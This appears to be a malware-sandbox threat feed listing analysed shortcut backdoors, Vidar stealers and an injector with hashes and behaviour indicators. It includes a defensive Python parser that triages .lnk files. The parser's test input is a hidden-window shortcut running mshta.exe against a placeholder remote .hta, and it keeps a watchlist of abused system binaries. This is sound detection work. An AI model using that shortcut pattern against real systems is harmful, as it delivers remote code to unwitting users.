Threat Feed
abordin@freemail.com.br.lnk
Analyzed: 2026-02-06T20:16:16.281
Verdict: malicious
File type: Windows Batch File (Shell Link)
SHA256: 6b98973ff442c9d126ef39308c7d8b8e1f0fa20142328f7c5d7d12cdd47ca49b
Classification: Backdoor

VMRay Threat Identifiers
Severity  Operation
5/5       Sets up server that accepts incoming connections
4/5       Abuses MSHTA to execute code
4/5       Attempts to connect through HTTPS
3/5       Suspicious content matched by YARA rules
2/5       Searches for sensitive browser data
2/5       Checks Internet connection
2/5       Downloads file
2/5       Performs DNS request
2/5       Suspicious content matched by YARA rules
1/5       Unusual large memory allocation
1/5       Accesses volumes directly
1/5       Connects to remote host
1/5       URL contains a TLD highly associated with phishing
1/5       Content matched by YARA rules
1/5       Query OS Information
abordin@freemail.com.br.lnk
Analyzed: 2026-02-06T20:15:56.459
Verdict: malicious
File type: Windows Batch File (Shell Link)
SHA256: 73cbf1178583bbf2bf1b85bdb0fc273979cb842fd3ca18397d6af7847a7edeba
Classification: Backdoor

VMRay Threat Identifiers
Severity  Operation
5/5       Sets up server that accepts incoming connections
4/5       Abuses MSHTA to execute code
4/5       Attempts to connect through HTTPS
3/5       Suspicious content matched by YARA rules
2/5       Performs DNS request
2/5       Searches for sensitive browser data
1/5       Connects to remote host
1/5       Unusual large memory allocation
1/5       Query OS Information
1/5       URL contains a TLD highly associated with phishing
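Both .lnk entries above are flagged for abusing MSHTA and for launching a hidden process. The static check an analyst wants before detonating such a file is to pull the target, the command-line arguments and the ShowCommand value straight out of the Shell Link header and StringData, which is all the loader needs to run mshta.exe against a remote .hta. The following is an added example, not code from this feed or from VMRay: a minimal MS-SHLLINK parser plus a triage routine. The sample .lnk it inspects is constructed in the script itself (the example.invalid URL and the ..\Windows\System32\mshta.exe path are placeholders), not the bytes of either sample listed here.

```python
import struct

# ShellLinkHeader layout from MS-SHLLINK: fixed 76-byte header, then StringData.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) needed to walk the structures after the header.
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

SW_SHOWMINNOACTIVE = 7  # window minimised and not activated: effectively hidden

# Living-off-the-land binaries whose presence in a shortcut target is worth a second look.
LOLBINS = ("mshta", "powershell", "cmd.exe", "rundll32", "wscript", "cscript",
           "certutil", "bitsadmin")


def _string_data(s: str) -> bytes:
    """StringData entry: 2-byte CountCharacters, then UTF-16LE chars, no terminator."""
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Construct a minimal .lnk carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS.
    Used here to fabricate test input; it is not a sample from the feed."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        HEADER_SIZE, LINK_CLSID, flags,
        0,            # FileAttributes
        0, 0, 0,      # CreationTime, AccessTime, WriteTime
        0, 0,         # FileSize, IconIndex
        show_command,
        0, 0, 0, 0,   # HotKey, Reserved1, Reserved2, Reserved3
    )
    return header + _string_data(relative_path) + _string_data(arguments)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields and ShowCommand of a Shell Link file."""
    if (len(data) < HEADER_SIZE or data[:4] != struct.pack("<I", HEADER_SIZE)
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    show_command, = struct.unpack_from("<I", data, 60)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:      # IDListSize (2 bytes) + IDList
        size, = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:               # LinkInfoSize covers the whole structure
        size, = struct.unpack_from("<I", data, off)
        off += size
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            count, = struct.unpack_from("<H", data, off)
            off += 2
            nbytes = count * 2 if unicode else count
            raw = data[off:off + nbytes]
            off += nbytes
            fields[name] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
    fields["show_command"] = show_command
    return fields


def triage(fields: dict) -> list:
    """Flag the traits the feed entries above exhibit: LOLBin target, remote URL, hidden window."""
    reasons = []
    cmd = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    for lolbin in LOLBINS:
        if lolbin in cmd:
            reasons.append(f"launches {lolbin}")
    if "http://" in cmd or "https://" in cmd:
        reasons.append("remote URL in command line")
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("window hidden (SW_SHOWMINNOACTIVE)")
    return reasons


# Constructed sample: a shortcut that runs mshta.exe against a remote .hta with a hidden window.
SAMPLE = build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                   "https://example.invalid/payload.hta", SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE)
    print(parsed)
    print(triage(parsed))
```

The parser only walks the LinkTargetIDList and LinkInfo far enough to find StringData; for real samples you would also want the IDList decoded, because some droppers leave the StringData empty and put the command in the shell item list instead.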
build_69862bdca4e8e.exe
Analyzed: 2026-02-06T20:05:06.116
Verdict: malicious
File type: Windows Exe (x86-64)
SHA256: 5adf8dec18a90f3170616bb0b8d84be0409e0e2bb3d110b87a4bdb0d07ce54a1
Classification: Spyware, Stealer

VMRay Threat Identifiers
Severity  Operation
5/5       Combination of other detections shows multiple input capture behaviors
5/5       Vidar configuration was extracted
5/5       Malicious content matched by YARA rules
5/5       Tries to read cached credentials of various applications
4/5       Malicious content matched by YARA rules
3/5       Uses HTTP to upload a large amount of data
3/5       Takes screenshot
3/5       Reads installed applications
2/5       Searches for sensitive browser data
2/5       Dead Drop Resolver
2/5       Allows invalid SSL certificates
2/5       Searches for sensitive mail data
2/5       Tries to detect virtual machine
1/5       Possibly does reconnaissance
1/5       Reads system data
1/5       Query OS Information
1/5       Query CPU Properties
1/5       Enumerates running processes
1/5       Tries to detect debugger
chromelevator.exe
Analyzed: 2026-02-06T20:04:53.654
Verdict: malicious
File type: Windows Exe (x86-64)
SHA256: fe4e5fb28d2c2b3a640112b6b125ce8c4afa8be28342e3bfda097ad9dd2ef9ee
Classification: Downloader, Injector

VMRay Threat Identifiers
Severity  Operation
5/5       Makes indirect system calls to hide process injection
5/5       Combination of other detections shows configuration discovery
4/5       Makes indirect system call to possibly evade hooking based monitoring
4/5       Malicious content matched by YARA rules
4/5       Modifies control flow of another process
4/5       Writes into the memory of another process
3/5       Suspicious content matched by YARA rules
3/5       Reads installed applications
3/5       Takes screenshot
2/5       Tries to detect virtual machine
2/5       Searches for sensitive browser data
2/5       Reads sensitive browser data
2/5       Searches for sensitive application data
2/5       Suspicious content matched by YARA rules
2/5       Tries to detect analyzer sandbox
1/5       Query OS Information
1/5       Reads system data
1/5       Query CPU Properties
1/5       Resolves API functions dynamically
1/5       A monitored process crashed
1/5       Possibly does reconnaissance
1/5       Enumerates running processes
1/5       Creates a page with write and execute permissions
1/5       Creates process with hidden window
1/5       Checks external IP address
1/5       Tries to connect using an uncommon port
build_69862ab2d135a.exe
Analyzed: 2026-02-06T20:04:46.944
Verdict: malicious
File type: Windows Exe (x86-64)
SHA256: 0eda54caf4b219fb51fdd3ad07e0ef150530bb98ebac6effaba93d83291a380f
Classification: Spyware, Injector, Stealer

VMRay Threat Identifiers
Severity  Operation
5/5       Malicious content matched by YARA rules
5/5       Tries to read cached credentials of various applications
5/5       Vidar configuration was extracted
4/5       Malicious content matched by YARA rules
4/5       Modifies control flow of another process
4/5       Writes into the memory of another process
3/5       Uses HTTP to upload a large amount of data
3/5       Reads installed applications
2/5       Tries to detect virtual machine
2/5       Reads sensitive browser data
2/5       Allows invalid SSL certificates
2/5       Searches for sensitive mail data
2/5       Searches for sensitive browser data
2/5       Suspicious content matched by YARA rules
1/5       Creates a page with write and execute permissions
1/5       Query OS Information
1/5       Reads system data
1/5       Resolves API functions dynamically
1/5       Query CPU Properties
1/5       Enumerates running processes
1/5       Creates process with hidden window
1/5       Tries to detect debugger